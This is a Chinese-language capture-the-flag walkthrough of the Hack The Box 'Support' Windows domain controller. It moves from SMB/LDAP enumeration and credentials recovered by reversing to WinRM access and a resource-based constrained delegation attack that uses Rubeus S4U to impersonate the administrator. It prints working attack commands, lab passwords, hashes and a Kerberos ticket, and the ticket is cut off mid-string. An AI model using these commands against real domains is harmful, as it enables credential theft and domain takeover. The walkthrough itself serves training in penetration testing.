Support
1. 信息收集
1.1. nmap
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# nmap 10.10.11.174 -p- -sCV -o nmap.txt -vv
Warning: The -o option is deprecated. Please use -oN
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-30 06:14 EDT
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:14
Completed NSE at 06:14, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:14
Completed NSE at 06:14, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:14
Completed NSE at 06:14, 0.00s elapsed
Initiating Ping Scan at 06:14
Scanning 10.10.11.174 [4 ports]
Completed Ping Scan at 06:14, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:14
Completed Parallel DNS resolution of 1 host. at 06:14, 0.00s elapsed
Initiating SYN Stealth Scan at 06:14
Scanning 10.10.11.174 [65535 ports]
Discovered open port 139/tcp on 10.10.11.174
Discovered open port 135/tcp on 10.10.11.174
Discovered open port 53/tcp on 10.10.11.174
Discovered open port 445/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 1.61% done; ETC: 06:46 (0:31:34 remaining)
Discovered open port 49667/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 5.91% done; ETC: 06:31 (0:16:11 remaining)
SYN Stealth Scan Timing: About 10.96% done; ETC: 06:27 (0:12:20 remaining)
SYN Stealth Scan Timing: About 27.68% done; ETC: 06:21 (0:05:16 remaining)
Discovered open port 49680/tcp on 10.10.11.174
Discovered open port 5985/tcp on 10.10.11.174
Discovered open port 3268/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 41.91% done; ETC: 06:20 (0:03:29 remaining)
SYN Stealth Scan Timing: About 52.53% done; ETC: 06:20 (0:03:05 remaining)
Discovered open port 9389/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 64.18% done; ETC: 06:20 (0:02:11 remaining)
Discovered open port 3269/tcp on 10.10.11.174
Discovered open port 636/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 74.44% done; ETC: 06:19 (0:01:31 remaining)
Discovered open port 593/tcp on 10.10.11.174
Discovered open port 49704/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 80.49% done; ETC: 06:20 (0:01:12 remaining)
Discovered open port 49676/tcp on 10.10.11.174
Discovered open port 389/tcp on 10.10.11.174
SYN Stealth Scan Timing: About 86.77% done; ETC: 06:20 (0:00:50 remaining)
Discovered open port 464/tcp on 10.10.11.174
Discovered open port 88/tcp on 10.10.11.174
Discovered open port 49742/tcp on 10.10.11.174
Discovered open port 49664/tcp on 10.10.11.174
Completed SYN Stealth Scan at 06:19, 353.75s elapsed (65535 total ports)
Initiating Service scan at 06:19
Scanning 19 services on 10.10.11.174
Completed Service scan at 06:20, 55.65s elapsed (19 services on 1 host)
NSE: Script scanning 10.10.11.174.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:20
NSE Timing: About 99.96% done; ETC: 06:21 (0:00:00 remaining)
Completed NSE at 06:21, 40.04s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 10.44s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
Nmap scan report for 10.10.11.174
Host is up, received echo-reply ttl 127 (0.10s latency).
Scanned at 2025-05-30 06:14:03 EDT for 459s
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-05-30 09:58:46Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49680/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49742/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 19493/tcp): CLEAN (Timeout)
| Check 2 (port 25330/tcp): CLEAN (Timeout)
| Check 3 (port 45724/udp): CLEAN (Timeout)
| Check 4 (port 37889/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2025-05-30T09:59:37
|_ start_date: N/A
|_clock-skew: -21m16s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:21
Completed NSE at 06:21, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 460.24 seconds
Raw packets sent: 131278 (5.776MB) | Rcvd: 243 (10.676KB)
发现是没有开放web服务
1.2. 基本检测
#smb空会话检测
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# nxc smb support.htb --shares
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
#ldap信息
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# ldapsearch-ad.py -l 10.10.11.174 -t info
### Server infos ###
[+] Forest functionality level = Windows 2016
[+] Domain functionality level = Windows 2016
[+] Domain controller functionality level = Windows 2016
[+] rootDomainNamingContext = DC=support,DC=htb
[+] defaultNamingContext = DC=support,DC=htb
[+] ldapServiceName = support.htb:dc$@SUPPORT.HTB
[+] naming_contexts = ['DC=support,DC=htb', 'CN=Configuration,DC=support,DC=htb', 'CN=Schema,CN=Configuration,DC=support,DC=htb', 'DC=DomainDnsZones,DC=support,DC=htb', 'DC=ForestDnsZones,DC=support,DC=htb']
#smbclient
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# smbclient -N -L //10.10.11.174
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
support-tools Disk support staff tools
SYSVOL Disk Logon server share
1.3. SMB利用
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 20 13:01:06 2022
.. D 0 Sat May 28 07:18:25 2022
7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022
npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022
putty.exe A 1273576 Sat May 28 07:20:06 2022
SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022
UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022
windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022
WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022
4026367 blocks of size 4096. 967509 blocks available
smb: \>
这里有一个 UserInfo.exe.zip 是不寻常的文件
1.4. 逆向userINfo获取凭据
这个程序有两个功能 一个查找用户、一个获取用户信息
但是我这里显示出该服务器不可操作
利用 wireshark 对他进行抓包,查看是否有相关的数据包
我发现当我执行命令 UserInfo.exe find -first jack -lask mike 时,会有对 support.htb 的DNS请求
配置一下对应的hosts记录
我们重新进行请求,发现返回结果改变了
这次是没有找到对应的用户,我们使用通配符进行查询
C:\Users\Administrator\Desktop\UserInfo.exe>UserInfo.exe find -first * -lask *
raven.clifton
anderson.damian
monroe.david
cromwell.gerard
west.laura
levine.leopoldo
langley.lucy
daughtler.mabel
bardot.mary
stoll.rachelle
thomas.raphael
smith.rosario
wilson.shelby
hernandez.stanley
ford.victoria
这找到了很多个用户,把他保存下来
然后可以使用user命令进行查询
C:\Users\Administrator\Desktop\UserInfo.exe>UserInfo.exe user -username raven.clifton
First Name: clifton
Last Name: raven
Contact: raven.clifton@support.htb
Last Password Change: 2022/5/28 19:13:53
写个Bat脚本批量查询
@echo off
setlocal enableDelayedExpansion
set "usernames=raven.clifton anderson.damian monroe.david cromwell.gerard west.laura levine.leopoldo langley.lucy daughtler.mabel bardot.mary stoll.rachelle thomas.raphael smith.rosario wilson.shelby hernandez.stanley ford.victoria"
for %%u in (%usernames%) do (
echo --------------------------------------------------
UserInfo.exe user -username %%u
)
pause
endlocal
--------------------------------------------------
First Name: clifton
Last Name: raven
Contact: raven.clifton@support.htb
Last Password Change: 2022/5/28 19:13:53
--------------------------------------------------
First Name: damian
Last Name: anderson
Contact: anderson.damian@support.htb
Last Password Change: 2022/5/28 19:13:05
--------------------------------------------------
First Name: david
Last Name: monroe
Contact: monroe.david@support.htb
Last Password Change: 2022/5/28 19:14:39
--------------------------------------------------
First Name: gerard
Last Name: cromwell
Contact: cromwell.gerard@support.htb
Last Password Change: 2022/5/28 19:14:24
--------------------------------------------------
First Name: laura
Last Name: west
Contact: west.laura@support.htb
Last Password Change: 2022/5/28 19:14:55
--------------------------------------------------
First Name: leopoldo
Last Name: levine
Contact: levine.leopoldo@support.htb
Last Password Change: 2022/5/28 19:13:37
--------------------------------------------------
First Name: lucy
Last Name: langley
Contact: langley.lucy@support.htb
Last Password Change: 2022/5/28 19:15:10
--------------------------------------------------
First Name: mabel
Last Name: daughtler
Contact: daughtler.mabel@support.htb
Last Password Change: 2022/5/28 19:15:26
--------------------------------------------------
First Name: mary
Last Name: bardot
Contact: bardot.mary@support.htb
Last Password Change: 2022/5/28 19:14:08
--------------------------------------------------
First Name: rachelle
Last Name: stoll
Contact: stoll.rachelle@support.htb
Last Password Change: 2022/5/28 19:15:42
--------------------------------------------------
First Name: raphael
Last Name: thomas
Contact: thomas.raphael@support.htb
Last Password Change: 2022/5/28 19:13:21
--------------------------------------------------
First Name: rosario
Last Name: smith
Contact: smith.rosario@support.htb
Last Password Change: 2022/5/28 19:12:19
--------------------------------------------------
First Name: shelby
Last Name: wilson
Contact: wilson.shelby@support.htb
Last Password Change: 2022/5/28 19:12:50
--------------------------------------------------
First Name: stanley
Last Name: hernandez
Contact: hernandez.stanley@support.htb
Last Password Change: 2022/5/28 19:12:34
--------------------------------------------------
First Name: victoria
Last Name: ford
Contact: ford.victoria@support.htb
Last Password Change: 2022/5/28 19:15:58
很遗憾没有什么有用的信息
但是为什么这个程序可以查找这些用户的信息呢,因为这里是不操作ldap匿名访问的,所以肯定是通过了ldap认证的,要通过ldap认证那么肯定是需要有凭证的。
尝试逆向获取凭证,
这里直接用ida_pro+mcp获取到了密码
support\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
1.5. bloodhound
有了这个凭据后我们可以收集一波域内信息
┌──(root㉿kali)-[~/Desktop/htb]
└─# bloodhound-python -c All -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -d support.htb -ns 10.10.11.174 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: support.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.support.htb
INFO: Found 21 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: Management.support.htb
INFO: Querying computer: dc.support.htb
INFO: Done in 00M 25S
INFO: Compressing output into 20250530105939_bloodhound.zip
这里简单看了下,没有什么可以利用的
1.6. rid枚举
┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --rid-brute
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
SMB 10.10.11.174 445 DC 498: SUPPORT\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.174 445 DC 500: SUPPORT\Administrator (SidTypeUser)
SMB 10.10.11.174 445 DC 501: SUPPORT\Guest (SidTypeUser)
SMB 10.10.11.174 445 DC 502: SUPPORT\krbtgt (SidTypeUser)
SMB 10.10.11.174 445 DC 512: SUPPORT\Domain Admins (SidTypeGroup)
SMB 10.10.11.174 445 DC 513: SUPPORT\Domain Users (SidTypeGroup)
SMB 10.10.11.174 445 DC 514: SUPPORT\Domain Guests (SidTypeGroup)
SMB 10.10.11.174 445 DC 515: SUPPORT\Domain Computers (SidTypeGroup)
SMB 10.10.11.174 445 DC 516: SUPPORT\Domain Controllers (SidTypeGroup)
SMB 10.10.11.174 445 DC 517: SUPPORT\Cert Publishers (SidTypeAlias)
SMB 10.10.11.174 445 DC 518: SUPPORT\Schema Admins (SidTypeGroup)
SMB 10.10.11.174 445 DC 519: SUPPORT\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.174 445 DC 520: SUPPORT\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.174 445 DC 521: SUPPORT\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.174 445 DC 522: SUPPORT\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.174 445 DC 525: SUPPORT\Protected Users (SidTypeGroup)
SMB 10.10.11.174 445 DC 526: SUPPORT\Key Admins (SidTypeGroup)
SMB 10.10.11.174 445 DC 527: SUPPORT\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.174 445 DC 553: SUPPORT\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.174 445 DC 571: SUPPORT\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.174 445 DC 572: SUPPORT\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.174 445 DC 1000: SUPPORT\DC$ (SidTypeUser)
SMB 10.10.11.174 445 DC 1101: SUPPORT\DnsAdmins (SidTypeAlias)
SMB 10.10.11.174 445 DC 1102: SUPPORT\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.174 445 DC 1103: SUPPORT\Shared Support Accounts (SidTypeGroup)
SMB 10.10.11.174 445 DC 1104: SUPPORT\ldap (SidTypeUser)
SMB 10.10.11.174 445 DC 1105: SUPPORT\support (SidTypeUser)
SMB 10.10.11.174 445 DC 1106: SUPPORT\smith.rosario (SidTypeUser)
SMB 10.10.11.174 445 DC 1107: SUPPORT\hernandez.stanley (SidTypeUser)
SMB 10.10.11.174 445 DC 1108: SUPPORT\wilson.shelby (SidTypeUser)
SMB 10.10.11.174 445 DC 1109: SUPPORT\anderson.damian (SidTypeUser)
SMB 10.10.11.174 445 DC 1110: SUPPORT\thomas.raphael (SidTypeUser)
SMB 10.10.11.174 445 DC 1111: SUPPORT\levine.leopoldo (SidTypeUser)
SMB 10.10.11.174 445 DC 1112: SUPPORT\raven.clifton (SidTypeUser)
SMB 10.10.11.174 445 DC 1113: SUPPORT\bardot.mary (SidTypeUser)
SMB 10.10.11.174 445 DC 1114: SUPPORT\cromwell.gerard (SidTypeUser)
SMB 10.10.11.174 445 DC 1115: SUPPORT\monroe.david (SidTypeUser)
SMB 10.10.11.174 445 DC 1116: SUPPORT\west.laura (SidTypeUser)
SMB 10.10.11.174 445 DC 1117: SUPPORT\langley.lucy (SidTypeUser)
SMB 10.10.11.174 445 DC 1118: SUPPORT\daughtler.mabel (SidTypeUser)
SMB 10.10.11.174 445 DC 1119: SUPPORT\stoll.rachelle (SidTypeUser)
SMB 10.10.11.174 445 DC 1120: SUPPORT\ford.victoria (SidTypeUser)
SMB 10.10.11.174 445 DC 2601: SUPPORT\MANAGEMENT$ (SidTypeUser)
1.7. 密码碰撞
┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u valid_user.txt -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --continue-on-success |grep +
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
1.8. SMB共享
┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --shares
SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.174 445 DC [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
SMB 10.10.11.174 445 DC [*] Enumerated shares
SMB 10.10.11.174 445 DC Share Permissions Remark
SMB 10.10.11.174 445 DC ----- ----------- ------
SMB 10.10.11.174 445 DC ADMIN$ Remote Admin
SMB 10.10.11.174 445 DC C$ Default share
SMB 10.10.11.174 445 DC IPC$ READ Remote IPC
SMB 10.10.11.174 445 DC NETLOGON READ Logon server share
SMB 10.10.11.174 445 DC support-tools READ support staff tools
SMB 10.10.11.174 445 DC SYSVOL READ Logon server share
1.9. ldap信息收集
ldapsearch -x -H ldap://support.htb -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb"
发现 support 用户有info字段,其值为 Ironside47pleasure40Watchful
# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20250530101950.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 86107
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 2
codePage: 0
countryCode: 0
badPasswordTime: 133930902999872286
lastLogoff: 0
lastLogon: 133930753939716104
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 133930739906591035
这可能是密码,我们可以尝试一下
┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc smb 10.10.11.174 -u valid_user.txt -p 'Ironside47pleasure40Watchful' --continue-on-success |grep +
SMB 10.10.11.174 445 DC [+] support.htb\support:Ironside47pleasure40Watchful
我们现在有了这个用户的凭据,用Bloodhound看看有没有什么权限
bloodhound-python -c All -u support -p 'Ironside47pleasure40Watchful' -d support.htb -ns 10.10.11.174 --zip
发现他是远程管理组的成员
1.10. evil-winrm
┌──(root㉿kali)-[~/Desktop/htb]
└─# nxc winrm 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful'
WINRM 10.10.11.174 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:support.htb)
WINRM 10.10.11.174 5985 DC [+] support.htb\support:Ironside47pleasure40Watchful (Pwn3d!)
┌──(root㉿kali)-[~/Desktop/htb]
└─# evil-winrm -i 10.10.11.174 -u support -p Ironside47pleasure40Watchful
*Evil-WinRM* PS C:\Users\support\desktop> type user.txt
b5e7c659b44909e48a1091f60d87d40b
2. RBCD
看看我们现在的这个 support 有什么可以利用的
发现我们对DC机器有完全控制权限,那这就很简单了
这里一般有两种方式可以利用,一个是 Shadow Credentials 还有一个是 RBCD
对于第一种情况,需要域控有自己的密钥对(如开启了AD-CS 存在CA等情况下),这里不满足,所以我们使用RBCD
┌──(root㉿kali)-[~/Desktop/htb]
└─# impacket-addcomputer -method LDAPS -computer-name 'c1trus$' -computer-pass 'Admin123!' -dc-host 10.10.11.174 -domain-netbios support.htb 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] socket ssl wrapping error: [Errno 104] Connection reset by peer
这里发现不能从外面进行LDAPS认证,会报错。
通过Evil-winrm进行RBCD,这里会用到 Rubeus
此外还要上传两个ps1脚本进行查询 条件是否满足
*Evil-WinRM* PS C:\Users\support\Documents> ls
Directory: C:\Users\support\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2025 8:54 AM 135576 Powermad.ps1
-a---- 5/30/2025 8:55 AM 770279 PowerView.ps1
-a---- 5/30/2025 8:56 AM 446976 Rubeus.exe
#使用点源操作符导入模组(注意有空格)
*Evil-WinRM* PS C:\Users\support\Documents> . .\Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> . .\PowerView.ps1
#验证当前用户是否可以添加机器到域中
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota
ms-ds-machineaccountquota
-------------------------
10 #符合默认域用户可以添加10台机器
#查看域控版本(RBCD需要2012及以上的域控才行)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainController | select name,osversion | fl
Name : dc.support.htb
OSVersion : Windows Server 2022 Standard
#查看 `msds-allowedtoactonbehalfofotheridentity` 属性是否为空
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name,msds-allowedtoactonbehalfofotheridentity | fl
name : DC
msds-allowedtoactonbehalfofotheridentity :
#创建一个新的“假机器”账户
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FakeComputer -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FakeComputer added
#获取‘假机器用户’的SID,并保存在变量里面,方便后面使用
*Evil-WinRM* PS C:\Users\support\Documents> $fakesid=Get-DomainComputer FakeComputer | select -expand objectsid
*Evil-WinRM* PS C:\Users\support\Documents> $fakesid
S-1-5-21-1677581083-3380853377-188903654-5601
#然后配置域控,使其信任假机器用户,从而使假机器用户可以代表域控进行决策
*Evil-WinRM* PS C:\Users\support\Documents> $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
*Evil-WinRM* PS C:\Users\support\Documents> $SDBytes = New-Object byte[] ($SD.BinaryLength)
*Evil-WinRM* PS C:\Users\support\Documents> $SD.GetBinaryForm($SDBytes, 0)
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer FakeComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
#然后验证一下
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer FakeComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
*Evil-WinRM* PS C:\Users\support\Documents> $RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
*Evil-WinRM* PS C:\Users\support\Documents> $Descriptor.DiscretionaryAcl
BinaryLength : 36
AceQualifier : AccessAllowed #成功了
IsCallback : False
OpaqueLength : 0
AccessMask : 983551
SecurityIdentifier : S-1-5-21-1677581083-3380853377-188903654-5601
AceType : AccessAllowed
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
可以用 BloodHound 在抓取一下看看此时的情况
现在已经具有RBCD了
使用 Rubeus 获取我虚假计算机账户的哈希值
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:Fakecomputer$ /domain:support.htb
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Calculate Password Hash(es)
[*] Input password : Password123
[*] Input username : Fakecomputer
[*] Input domain : support.htb
[*] Salt : SUPPORT.HTBFakecomputer
[*] rc4_hmac : 58A478135A93AC3BF058A5EA0E8FDB71
[*] aes128_cts_hmac_sha1 : BC7A02EF683D3145CF69173D862938C0
[*] aes256_cts_hmac_sha1 : 4E93FD9F6AFAECB92D38E4B4CD89BB25A211630E92731402C1C935754F0FF4EB
[*] des_cbc_md5 : B564A22CD9578058
然后通过Rubeus利用 rc4_hmac 哈希获取管理员权限的CIFS票据
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:Fakecomputer$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt /nowrap /outfile:ticket.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\Fakecomputer$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFljCCBZKgAwIBBaEDAgEWooIEqTCCBKVhggShMIIEnaADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBGMwggRfoAMCARKhAwIBAqKCBFEEggRNgr4UUrgNcLLh8s7eRzvZJXa4IpXctfXXM81/VdqYRSXoK46fMFmiO2Bhsvxwf/wzVgaoSzFjHbRe7ROsrhfLDrf7l2QSsVgtmqrFXnKlIaEjOo6Ek8J2Z0vYONW2AKW+1RZYxnVxbc6brW0gjEKurKDuPZeAxgYBn8ZZ5i4TW7z+jrSvunaIUCCp8KB2rl+eT4K/EQKjgg2aGJhfT+3Uc33pp6B1ku89ImsgtdFjMow4AyJ6iSrD64avc5U8Rl/WsaNngUu9myt2+RNMHtFjvIR8BkPhlW2RLypXeyFS70r8KTtH73vXjT9I2kfxkg0hDMWxtE5F3UHfJbv8Mo2r2La0IjC7Yt6JiAspJAHD9XNRMp1KQA9k5KcRiQbYK1E5E/rN+pKP8wcMIfEBBp42gs40jf/k8bCifwy8168rF8Rp2F5HK0870GDn+Sb5J5NKS0vFqZ3orwHJV71imAZZs+LHc/P8d8yHc7Prc7Q54kZBy7cmRYIcEZtIuWr3qqIEd7Ygi60KpecLrf525sOurfp5IiMhRYv3LqYdWHyn3hAiWXM1ZSdGCszfLrwx4NZ2O0Lpy8ve9fbFBi4A93tXYl6paG4nbwrmq9Skot4Az0eX/FS1lghcphhh0PybuMhVDZA5eTD/H8X/AkgqWzw99LCX/edc/Yx24GXYNrCu/qnO+vCIvDLKVXeiQ0kPk0eFy9HqcLofZ85Upx2mzmRJ8apX53AhlbPFn8oWyqsSba6Ls8eAQi+bm0jp6i/NWfa1xtVXzJEn2hACN2Kxw1q2OqXJPCfTAD5debgNo6vzYNmG0J7zfpfALZJZOx+1kWJlwrg3+M0Rx0tSi4FMa8ktsb2S9rsA5Az2M/U1P+fi4ZThMYude8kmHjRC9r4KkTPiX1FMJclMqRgfigsGJvPKQVZulyqUMStEFkuvdgKtI3awI+q0REdj4iui2fuIZbSJeXv0EzupOkWOtTI+ecIfszuYhD0XReuUBUgnWX152yVhdrH/pZNKv5zL8Y